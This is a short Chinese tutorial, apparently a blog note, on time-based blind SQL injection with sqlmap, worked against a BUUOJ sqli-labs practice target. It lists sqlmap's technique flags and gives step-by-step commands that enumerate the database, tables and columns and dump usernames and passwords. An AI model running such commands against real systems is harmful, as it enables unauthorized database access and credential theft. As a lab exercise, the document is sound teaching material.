什么是时间盲注

时间盲注是指基于时间的盲注，也叫延时注入，根据页面的响应时间来判断是否存在注入。

使用sqlmap不同的技术

sqlmap --technique 参数用来设置具体SQL注入技术
B: Boolean-based blind 基于布尔的忙逐步

E:Error-based 报错注入

U：Union query-based Union查询注入

S:Stacked queries 堆叠注入

T：Time-based blind 基于时间的盲注

Q：lnline queries 内联查询注入

例如：

sqlmap -u “存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。
原文链接：https://blog.csdn.net/qq_49091880/article/details/122301562

使用时间盲注的脚本

1.爆数据库

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T --current-db --batch

batch是强制执行所有选择Y

2.爆破表名

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security --tables --batch

 

3.爆破列名

时间太慢了，sqlmap可以调整回显时间，

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users --columns --time-sec=1 --batch

 --time-sec=1：回显时间为1

4. 爆破列里的数据

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C password --dump --time-sec=1 --batch
sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C username --dump --time-sec=1 --batch

时间盲注缺点：用时比较长。